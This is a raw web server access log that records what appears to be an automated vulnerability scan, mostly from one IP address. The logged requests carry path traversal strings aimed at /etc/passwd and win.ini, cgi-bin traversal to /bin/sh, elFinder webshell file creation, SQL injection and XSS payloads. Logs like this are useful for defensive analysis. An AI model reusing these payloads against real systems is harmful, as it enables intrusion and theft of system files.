205.185.122.202 - - [19/Oct/2025:16:49:15 +0530] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=34HFReNMx5Gf6IU69f9eQOxUNSy.php&target=l1_Lw HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:16:49:15 +0530] "GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=34HFReNMx5Gf6IU69f9eQOxUNSy.php&target=l1_Lw HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:16:49:16 +0530] "GET /backend/backend/auth/restore HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:49:16 +0530] "GET /backend/backend/auth/restore HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:16:49:46 +0530] "GET /t/index.php?action[]=aaaa HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:49:46 +0530] "GET /t/index.php?action[]=aaaa HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:49:47 +0530] "GET /status.htm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:49:47 +0530] "GET /status.htm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:49:58 +0530] "POST /RPC2_Login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:49:58 +0530] "POST /RPC2_Login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:50:12 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:13 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:15 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:15 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:18 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:19 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:21 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:22 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:24 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:25 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:27 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:28 +0530] "POST /_ignition/execute-solution HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:16:50:33 +0530] "POST /RPC2_Login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:50:34 +0530] "POST /RPC2_Login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:16:50:59 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:50:59 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:16:51:18 +0530] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:51:19 +0530] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:16:51:22 +0530] "GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:16:51:22 +0530] "GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:16:52:13 +0530] "GET /%u002e/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:52:14 +0530] "GET /%u002e/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:52:16 +0530] "GET /.%00/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:52:17 +0530] "GET /.%00/WEB-INF/web.xml HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:16:52:22 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:52:23 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:52:26 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:16:52:26 +0530] "POST /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:16:52:27 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:52:28 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:52:29 +0530] "GET /wp-admin/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:52:29 +0530] "GET /wp-admin/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:16:52:30 +0530] "GET /wp-content/uploads/pp-files/jzxlh.php HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:52:31 +0530] "GET /wp-content/uploads/pp-files/jzxlh.php HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:52:43 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:52:43 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:53:25 +0530] "GET /account/edit-profile/ HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:16:53:25 +0530] "GET /account/edit-profile/ HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:16:53:36 +0530] "POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:53:36 +0530] "POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:53:40 +0530] "GET /bludit/admin/login HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:53:41 +0530] "GET /bludit/admin/login HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:54:21 +0530] "PUT /SDK/webLanguage HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:16:54:22 +0530] "PUT /SDK/webLanguage HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:16:54:25 +0530] "GET /x HTTP/1.1" 404 996
205.185.122.202 - - [19/Oct/2025:16:54:25 +0530] "GET /x HTTP/1.1" 404 996
87.120.191.37 - - [19/Oct/2025:16:54:30 +0530] "GET /json/ HTTP/1.1" 404 1004
87.120.191.37 - - [19/Oct/2025:16:54:31 +0530] "-" 400 -
87.120.191.37 - - [19/Oct/2025:16:54:31 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:16:54:34 +0530] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:54:34 +0530] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:16:54:37 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:54:38 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:54:39 +0530] "GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:54:39 +0530] "GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:54:49 +0530] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:16:54:49 +0530] "GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:16:54:51 +0530] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:54:51 +0530] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:16:54:52 +0530] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:16:54:52 +0530] "GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:16:55:06 +0530] "GET /dashboardUser HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:55:06 +0530] "GET /dashboardUser HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:55:28 +0530] "POST /home/download HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:55:29 +0530] "POST /home/download HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:16:55:39 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:55:39 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:16:55:39 +0530] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:55:40 +0530] "POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:55:41 +0530] "GET /wp-admin/admin-ajax.php?action=a84ac2df72ef9cf2a1f1442fa244c014 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:55:41 +0530] "GET /wp-admin/admin-ajax.php?action=8c1b70253866869e3e19202a4b00615c HTTP/1.1" 404 1040
45.142.193.27 - - [19/Oct/2025:16:55:42 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:55:43 +0530] "POST /controller/login.php?acao=autenticar HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:55:44 +0530] "GET /wp-admin/admin-ajax.php?action=0371f949a0d24a6259cd8b183e77234a HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:55:44 +0530] "GET /wp-admin/admin-ajax.php?action=d1676d97484751d186de6cc293bd55ed HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:16:55:44 +0530] "POST /controller/login.php?acao=autenticar HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:55:46 +0530] "POST /controller/login.php?acao=autenticar HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:55:47 +0530] "POST /controller/login.php?acao=autenticar HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:16:56:07 +0530] "POST /wsman HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:16:56:07 +0530] "POST /wsman HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:16:56:10 +0530] "GET /login/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:16:56:10 +0530] "GET /login/ HTTP/1.1" 404 1006
204.76.203.15 - - [19/Oct/2025:16:56:52 +0530] "GET / HTTP/1.1" 200 11250
204.76.203.15 - - [19/Oct/2025:16:58:06 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:16:58:06 +0530] "GET /api/v1/components?name=1&1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:58:07 +0530] "GET /api/v1/components?name=1&1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:16:58:17 +0530] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 404 1172
205.185.122.202 - - [19/Oct/2025:16:58:17 +0530] "POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1" 404 1172
205.185.122.202 - - [19/Oct/2025:16:59:01 +0530] "OPTIONS /wp-json/omapp/v1/support HTTP/1.1" 200 -
205.185.122.202 - - [19/Oct/2025:16:59:01 +0530] "OPTIONS /wp-json/omapp/v1/support HTTP/1.1" 200 -
205.185.122.202 - - [19/Oct/2025:16:59:17 +0530] "GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:16:59:17 +0530] "GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:16:59:49 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:16:59:49 +0530] "POST /cobbler_api HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:00:02 +0530] "GET /geoserver/ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:00:02 +0530] "GET /geoserver/ HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:00:04 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:00:04 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:00:37 +0530] "GET /about/../tree?action=get HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:00:38 +0530] "GET /about/../tree?action=get HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:00:39 +0530] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:17:00:40 +0530] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:17:00:43 +0530] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:17:00:44 +0530] "POST /./RestAPI/LogonCustomization HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:17:00:46 +0530] "POST /./RestAPI/Connection HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:00:48 +0530] "POST /./RestAPI/Connection HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:00:50 +0530] "GET /help/admin-guide/test.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:00:52 +0530] "GET /help/admin-guide/test.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:17:00:54 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:00:54 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:07 +0530] "POST /v1/backend1 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:08 +0530] "POST /v1/backend1 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:11 +0530] "GET /v1/34HFRUqkdFKEyuOBmDQjpqEfLEe.php HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:17:01:12 +0530] "GET /v1/34HFRUqkdFKEyuOBmDQjpqEfLEe.php HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:17:01:13 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:13 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:13 +0530] "POST /install.php?page=1 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:13 +0530] "POST /install.php?page=1 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:43 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:01:43 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
87.120.191.37 - - [19/Oct/2025:17:02:01 +0530] "-" 400 -
205.185.122.202 - - [19/Oct/2025:17:02:20 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:02:20 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:02:23 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:02:24 +0530] "POST /install.php?page=4 HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:02:43 +0530] "POST /api/v1/login/oauth2/auth HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:02:43 +0530] "POST /api/v1/login/oauth2/auth HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:03:09 +0530] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:03:09 +0530] "GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:03:16 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:03:16 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:03:17 +0530] "POST /viewlog.jsp HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:03:18 +0530] "POST /viewlog.jsp HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:03:30 +0530] "POST /autodiscover/autodiscover.json HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:17:03:30 +0530] "POST /autodiscover/autodiscover.json HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:17:03:31 +0530] "POST /delete_cart_goods.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:03:32 +0530] "POST /delete_cart_goods.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:17:03:42 +0530] "POST /action.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:03:42 +0530] "POST /action.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:17:03:50 +0530] "POST /homeaction.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:03:50 +0530] "POST /homeaction.php HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:03:55 +0530] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:03:55 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:03:55 +0530] "POST /TransferredOutModal.php?modfunc=detail HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:03:55 +0530] "POST /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:04:19 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:04:20 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:04:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:04:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:04:35 +0530] "POST /api/graphql HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:04:35 +0530] "POST /api/graphql HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:04:56 +0530] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:04:58 +0530] "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:00 +0530] "GET /cgi-bin/slogin/login.py HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:05:00 +0530] "GET /cgi-bin/slogin/login.py HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:05:00 +0530] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:01 +0530] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:03 +0530] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:05 +0530] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:08 +0530] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:11 +0530] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:11 +0530] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:14 +0530] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:14 +0530] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:17 +0530] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:05:25 +0530] "GET /?rest_route=/wp/v2/posts HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:05:25 +0530] "GET /wp-json/wp/v2/posts HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:05:26 +0530] "GET /?rest_route=/wp/v2/posts HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:05:26 +0530] "GET /wp-json/wp/v2/posts HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:17:05:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:05:36 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:05:51 +0530] "POST /cas/v1/tickets/ HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:05:51 +0530] "POST /cas/v1/tickets/ HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:06:53 +0530] "GET /login.htm HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:06:53 +0530] "GET /login.htm HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:06:57 +0530] "GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:06:57 +0530] "GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:07:11 +0530] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=34HFQrsNUpojRuLSZ776ja2Gi5P.php:aaa HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:17:07:11 +0530] "GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name=34HFQrsNUpojRuLSZ776ja2Gi5P.php:aaa HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:17:07:22 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:07:23 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:17:07:26 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:07:27 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:07:28 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:07:28 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:07:34 +0530] "GET /file/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:07:34 +0530] "GET /file/../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:07:34 +0530] "GET /file/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:07:34 +0530] "GET /file/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:17:07:54 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:07:54 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:17:07:57 +0530] "POST /Side.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:17:07:57 +0530] "POST /Side.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:17:08:14 +0530] "GET /login/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:17:08:14 +0530] "GET /login/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:17:08:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:08:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:08:51 +0530] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:17:08:52 +0530] "GET /STATE_ID/123/agentLogUploader HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:17:08:53 +0530] "GET /changePassword?username=administrator HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:08:53 +0530] "GET /changePassword?username=administrator HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:17:08:58 +0530] "GET /client/index.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:08:58 +0530] "GET /client/index.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:09:29 +0530] "GET /api/blade-user/user-list HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:09:29 +0530] "GET /api/blade-user/user-list HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:09:29 +0530] "GET /api/blade-user/user-list HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:09:29 +0530] "GET /api/blade-user/user-list HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:09:29 +0530] "GET /api/blade-user/user-list HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:09:30 +0530] "GET /api/blade-user/user-list HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:17:09:31 +0530] "GET /language/lang HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:09:31 +0530] "GET /language/lang HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:10:11 +0530] "GET /index.php?p=member&destination HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:10:11 +0530] "GET /index.php?p=member&destination HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:17:10:16 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:10:16 +0530] "GET /scp/login.php HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:17:10:22 +0530] "GET /34HFRm5zzTM7pUpPfW3Zfcpi90u.txt HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:10:22 +0530] "GET /34HFRm5zzTM7pUpPfW3Zfcpi90u.txt HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:17:10:27 +0530] "PUT /34HFRm5zzTM7pUpPfW3Zfcpi90u.txt HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:17:10:27 +0530] "PUT /34HFRm5zzTM7pUpPfW3Zfcpi90u.txt HTTP/1.1" 403 1004
